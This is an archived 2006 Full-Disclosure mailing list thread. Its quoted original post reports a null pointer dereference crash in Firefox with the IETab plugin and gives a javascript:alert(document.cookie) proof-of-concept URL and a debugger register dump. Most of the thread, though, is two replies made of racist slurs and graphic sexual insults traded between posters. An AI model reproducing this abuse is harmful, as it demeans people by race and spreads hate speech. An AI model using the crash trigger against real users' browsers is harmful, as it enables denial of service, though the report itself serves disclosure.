lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <7a282fc30605181108w53cc3c74jf16b3b550e340605@mail.gmail.com>
Date: Thu May 18 19:08:40 2006
From: joshua.russel at gmail.com (Joshua Russel)
Subject: Firefox (with IETab Plugin) Null Pointer
	Dereferences Bug

Dear Klu-Klux-Klan Cocksucker,

I think there's no space for people like you in this list. Have you
ever, in your lowly life, coded a single program or known what exactly
a null-pointer dereference is? The only dereference you know is, when
your dad accidentally put the cock in your mouth instead of your ass,
a quite common occurence in a white family. So why don't your take the
propaganda up your ass and probably snoop in on your mom to see whom
she's fucking.

On 5/18/06, PERFECT. MATERIAL <perfect.material@...il.com> wrote:
> Dear Tan Colored Niggerish Guy,
>
> This is not the right list for Mozilla extension bug reports. This list is
> for security stuff only guy :)
>
> PERFECT.MATERIAL
>
> P.S. Your race smells bad you worthless idiot!
>
>
> On 5/17/06, Debasis Mohanty
> <debasis.mohanty.listmails@...il.com> wrote:
> > Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > Vendor: Mozilla
> > Product: FireFox with IE Tab
> >
> > Bugzilla ID: 14151 (
> http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
> > (Initially I incorrectly logged the bug under the wrong product,
> > thanks to Dan Veditz to log it under appropriate product on behalf of
> > me).
> >
> > Tested On:
> > FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
> >
> > Introduction:
> > IETab (https://addons.mozilla.org/firefox/1419/ ) is a
> recently
> > released (April 12, 2006) plugin for Firefox. It is used to browse IE
> > (only) specific sites under Firefox. Guess what ?? You can run
> > windowsupdate under FireFox
> > ;-)
> >
> > Bug Details:
> > Firefox with the IETab installed crashes when ietab plugin is unable
> > to handle specific javascripts. It seems to be a null pointer
> > dereference bug.
> > For more details refer the PoC section.
> >
> > Proof-of-Concept:
> > Copy & paste the following URL to the Firefox addressbar and press enter -
> >
> >
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);
> >
> > Note: This test will not work if IETab is not installed.
> >
> > The Registers details after the crash:
> >
> > (1e4.3e0): Access violation - code c0000005 (first chance) First
> > chance exceptions are reported before any exception handling.
> > This exception may be expected and handled.
> > eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> > eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> > nc
> > cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> > efl=00010246
> >
> > npietab!NP_GetEntryPoints+0xb8ac:
> >
> > 0192e7dc 668b10           mov     dx,[eax]
> > ds:0023:00000000=????
> > 0:000> g
> > (1e4.3e0 ): Access violation - code c0000005 (!!! second chance !!!)
> > eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> > edi=00000000
> > eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> > nc
> > cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> > efl=00000246
> > npietab!NP_GetEntryPoints+0xb8ac:
> > 0192e7dc 668b10           mov     dx,[eax]
> > ds:0023:00000000=????
> >
> >
> >
> > For more vulnerabilities :
> http://hackingspirits.com/vuln-rnd/vuln-rnd.html
> >
> >
> > Credits:
> > Debasis Mohanty (aka Tr0y)
> > www.hackingspirits.com
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ